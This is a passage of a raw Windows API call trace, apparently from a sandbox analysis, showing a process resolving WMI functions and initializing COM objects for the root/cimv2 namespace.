(hModule=0x727c0000, lpProcName="EndEnumeration") returned 0x727c73c0 [0183.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x36e360, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0183.572] GetProcAddress (hModule=0x727c0000, lpProcName="GetPropertyQualifierSet") returned 0x727c78b0 [0183.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x36e374, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClonemNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 5 [0183.591] GetProcAddress (hModule=0x727c0000, lpProcName="Clone") returned 0x727c6f30 [0183.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x36e36c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectTextmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 13 [0183.592] GetProcAddress (hModule=0x727c0000, lpProcName="GetObjectText") returned 0x727c77f0 [0183.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x36e368, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClassmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 17 [0183.661] GetProcAddress (hModule=0x727c0000, lpProcName="SpawnDerivedClass") returned 0x727c7e80 [0183.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x36e36c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstancemNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 13 [0183.674] GetProcAddress (hModule=0x727c0000, lpProcName="SpawnInstance") returned 0x727c7eb0 [0183.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x36e370, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTomNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 9 [0183.677] GetProcAddress (hModule=0x727c0000, lpProcName="CompareTo") returned 0x727c7020 [0183.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x36e368, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOriginmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 17 [0183.692] GetProcAddress (hModule=0x727c0000, lpProcName="GetPropertyOrigin") returned 0x727c7880 [0183.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x36e36c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFrom»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 12 [0183.719] GetProcAddress (hModule=0x727c0000, lpProcName="InheritsFrom") returned 0x727c7900 [0183.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x36e370, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 9 [0183.721] GetProcAddress (hModule=0x727c0000, lpProcName="GetMethod") returned 0x727c7730 [0183.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x36e370, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethodmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 9 [0183.745] GetProcAddress (hModule=0x727c0000, lpProcName="PutMethod") returned 0x727c7bf0 [0183.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x36e36c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethod»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 12 [0183.818] GetProcAddress (hModule=0x727c0000, lpProcName="DeleteMethod") returned 0x727c7320 [0183.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x36e364, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumerationNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 22 [0183.820] GetProcAddress (hModule=0x727c0000, lpProcName="BeginMethodEnumeration") returned 0x727c6e50 [0183.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x36e370, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethodNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 10 [0183.822] GetProcAddress (hModule=0x727c0000, lpProcName="NextMethod") returned 0x727c79d0 [0183.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x36e364, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumeration»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 20 [0183.837] GetProcAddress (hModule=0x727c0000, lpProcName="EndMethodEnumeration") returned 0x727c73e0 [0183.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x36e364, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSetmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 21 [0183.888] GetProcAddress (hModule=0x727c0000, lpProcName="GetMethodQualifierSet") returned 0x727c7790 [0183.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x36e368, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0183.891] GetProcAddress (hModule=0x727c0000, lpProcName="GetMethodOrigin") returned 0x727c7760 [0183.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x36e368, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Get»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 16 [0183.893] GetProcAddress (hModule=0x727c0000, lpProcName="QualifierSet_Get") returned 0x727c7c80 [0183.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x36e368, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Put»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 16 [0183.920] GetProcAddress (hModule=0x727c0000, lpProcName="QualifierSet_Put") returned 0x727c7d10 [0183.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x36e364, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0183.971] GetProcAddress (hModule=0x727c0000, lpProcName="QualifierSet_Delete") returned 0x727c7c40 [0183.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x36e364, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNamesmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 21 [0183.973] GetProcAddress (hModule=0x727c0000, lpProcName="QualifierSet_GetNames") returned 0x727c7cb0 [0183.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x36e35c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumerationmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 29 [0183.992] GetProcAddress (hModule=0x727c0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x727c7c20 [0183.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x36e368, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_NextmNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 17 [0183.994] GetProcAddress (hModule=0x727c0000, lpProcName="QualifierSet_Next") returned 0x727c7ce0 [0184.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x36e35c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0184.014] GetProcAddress (hModule=0x727c0000, lpProcName="QualifierSet_EndEnumeration") returned 0x727c7c60 [0184.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x36e360, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0184.015] GetProcAddress (hModule=0x727c0000, lpProcName="GetCurrentApartmentType") returned 0x727c78e0 [0184.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x36e364, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStub»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 20 [0184.028] GetProcAddress (hModule=0x727c0000, lpProcName="GetDemultiplexedStub") returned 0x727c75f0 [0184.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x36e364, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmimNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 21 [0184.047] GetProcAddress (hModule=0x727c0000, lpProcName="CreateInstanceEnumWmi") returned 0x727c7230 [0184.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x36e368, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmiNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 18 [0184.082] GetProcAddress (hModule=0x727c0000, lpProcName="CreateClassEnumWmi") returned 0x727c7160 [0184.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x36e36c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmi»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 12 [0184.084] GetProcAddress (hModule=0x727c0000, lpProcName="ExecQueryWmi") returned 0x727c74e0 [0184.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x36e360, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmi»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 24 [0184.178] GetProcAddress (hModule=0x727c0000, lpProcName="ExecNotificationQueryWmi") returned 0x727c7400 [0184.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x36e36c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmiNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 14 [0184.181] GetProcAddress (hModule=0x727c0000, lpProcName="PutInstanceWmi") returned 0x727c7b10 [0184.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x36e36c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi", lpUsedDefaultChar=0x0) returned 11 [0184.264] GetProcAddress (hModule=0x727c0000, lpProcName="PutClassWmi") returned 0x727c7a30 [0184.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x36e360, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObject»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 24 [0184.266] GetProcAddress (hModule=0x727c0000, lpProcName="CloneEnumWbemClassObject") returned 0x727c6f50 [0184.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x36e368, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmi»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 16 [0184.276] GetProcAddress (hModule=0x727c0000, lpProcName="ConnectServerWmi") returned 0x727c7050 [0184.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetErrorInfo", cchWideChar=12, lpMultiByteStr=0x36e36c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetErrorInfo»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 12 [0184.320] GetProcAddress (hModule=0x727c0000, lpProcName="GetErrorInfo") returned 0x727c7650 [0184.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Initialize", cchWideChar=10, lpMultiByteStr=0x36e370, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 10 [0184.323] GetProcAddress (hModule=0x727c0000, lpProcName="Initialize") returned 0x727c7920 [0184.328] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x36e320 | out: phkResult=0x36e320*=0x2f4) returned 0x0 [0184.329] RegQueryValueExW (in: hKey=0x2f4, lpValueName="WMIDisableCOMSecurity", lpReserved=0x0, lpType=0x36e33c, lpData=0x0, lpcbData=0x36e338*=0x0 | out: lpType=0x36e33c*=0x0, lpData=0x0, lpcbData=0x36e338*=0x0) returned 0x2 [0184.329] RegCloseKey (hKey=0x2f4) returned 0x0 [0184.330] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36ebb8 | out: pAptType=0x36ebb8*=1) returned 0x0 [0184.334] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x24eeed0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36ebbc | out: ppvObject=0x36ebbc*=0x0) returned 0x80004002 [0184.334] IUnknown:Release (This=0x6ee4bc) returned 0x0 [0184.380] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x36e80c | out: lpiid=0x36e80c) returned 0x0 [0184.383] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36e528 | out: ppv=0x36e528*=0x769338) returned 0x0 [0185.543] WbemDefPath:IUnknown:QueryInterface (in: This=0x769338, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e740 | out: ppvObject=0x36e740*=0x0) returned 0x80004002 [0185.543] WbemDefPath:IClassFactory:CreateInstance (in: This=0x769338, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e74c | out: ppvObject=0x36e74c*=0x768a58) returned 0x0 [0185.587] WbemDefPath:IUnknown:Release (This=0x769338) returned 0x0 [0185.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x768a58, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e36c | out: ppvObject=0x36e36c*=0x768a58) returned 0x0 [0185.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x768a58, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e320 | out: ppvObject=0x36e320*=0x0) returned 0x80004002 [0185.594] WbemDefPath:IUnknown:AddRef (This=0x768a58) returned 0x3 [0185.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x768a58, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36dc7c | out: ppvObject=0x36dc7c*=0x0) returned 0x80004002 [0185.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x768a58, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36dc2c | out: ppvObject=0x36dc2c*=0x0) returned 0x80004002 [0185.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x768a58, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36dc38 | out: ppvObject=0x36dc38*=0x769348) returned 0x0 [0185.594] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x769348, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36dc40 | out: pCid=0x36dc40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0185.594] WbemDefPath:IUnknown:Release (This=0x769348) returned 0x3 [0185.595] CoGetContextToken (in: pToken=0x36dc98 | out: pToken=0x36dc98) returned 0x0 [0185.596] CoGetContextToken (in: pToken=0x36e0ac | out: pToken=0x36e0ac) returned 0x0 [0185.596] WbemDefPath:IUnknown:QueryInterface (in: This=0x768a58, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0185.596] WbemDefPath:IUnknown:Release (This=0x768a58) returned 0x2 [0185.596] WbemDefPath:IUnknown:Release (This=0x768a58) returned 0x1 [0185.597] CoGetContextToken (in: pToken=0x36ea44 | out: pToken=0x36ea44) returned 0x0 [0185.597] CoGetContextToken (in: pToken=0x36e9a4 | out: pToken=0x36e9a4) returned 0x0 [0185.597] WbemDefPath:IUnknown:QueryInterface (in: This=0x768a58, riid=0x36ea74*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36ea70 | out: ppvObject=0x36ea70*=0x768a58) returned 0x0 [0185.597] WbemDefPath:IUnknown:AddRef (This=0x768a58) returned 0x3 [0185.597] WbemDefPath:IUnknown:Release (This=0x768a58) returned 0x2 [0185.599] WbemDefPath:IWbemPath:SetText (This=0x768a58, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0185.600] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f2ec | out: puCount=0x36f2ec*=0x2) returned 0x0 [0185.600] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f2e8*=0x0, pszText=0x0 | out: puBuffLength=0x36f2e8*=0xf, pszText=0x0) returned 0x0 [0185.601] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f2e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f2e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.605] CoGetObjectContext (in: riid=0x24eeee8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f274 | out: ppv=0x36f274*=0x6ee4bc) returned 0x0 [0185.605] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f26c | out: pAptType=0x36f26c*=1) returned 0x0 [0185.606] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x24eeed0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f270 | out: ppvObject=0x36f270*=0x0) returned 0x80004002 [0185.606] IUnknown:Release (This=0x6ee4bc) returned 0x0 [0185.606] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x36f174 | out: lpiid=0x36f174) returned 0x0 [0185.607] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee90 | out: ppv=0x36ee90*=0x77df48) returned 0x0 [0185.767] WbemLocator:IUnknown:QueryInterface (in: This=0x77df48, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f0a8 | out: ppvObject=0x36f0a8*=0x0) returned 0x80004002 [0185.767] WbemLocator:IClassFactory:CreateInstance (in: This=0x77df48, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0b4 | out: ppvObject=0x36f0b4*=0x769378) returned 0x0 [0185.767] WbemLocator:IUnknown:Release (This=0x77df48) returned 0x0 [0185.767] WbemLocator:IUnknown:QueryInterface (in: This=0x769378, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ecd4 | out: ppvObject=0x36ecd4*=0x769378) returned 0x0 [0185.767] WbemLocator:IUnknown:QueryInterface (in: This=0x769378, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec88 | out: ppvObject=0x36ec88*=0x0) returned 0x80004002 [0185.767] WbemLocator:IUnknown:AddRef (This=0x769378) returned 0x3 [0185.767] WbemLocator:IUnknown:QueryInterface (in: This=0x769378, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e5e4 | out: ppvObject=0x36e5e4*=0x0) returned 0x80004002 [0185.768] WbemLocator:IUnknown:QueryInterface (in: This=0x769378, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e594 | out: ppvObject=0x36e594*=0x0) returned 0x80004002 [0185.768] WbemLocator:IUnknown:QueryInterface (in: This=0x769378, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5a0 | out: ppvObject=0x36e5a0*=0x0) returned 0x80004002 [0185.768] CoGetContextToken (in: pToken=0x36e600 | out: pToken=0x36e600) returned 0x0 [0185.768] CoGetObjectContext (in: riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x77df4c | out: ppv=0x77df4c*=0x6ee4b0) returned 0x0 [0185.769] CoGetContextToken (in: pToken=0x36ea14 | out: pToken=0x36ea14) returned 0x0 [0185.769] WbemLocator:IUnknown:QueryInterface (in: This=0x769378, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea94 | out: ppvObject=0x36ea94*=0x0) returned 0x80004002 [0185.769] WbemLocator:IUnknown:Release (This=0x769378) returned 0x2 [0185.769] WbemLocator:IUnknown:Release (This=0x769378) returned 0x1 [0185.769] CoGetContextToken (in: pToken=0x36f094 | out: pToken=0x36f094) returned 0x0 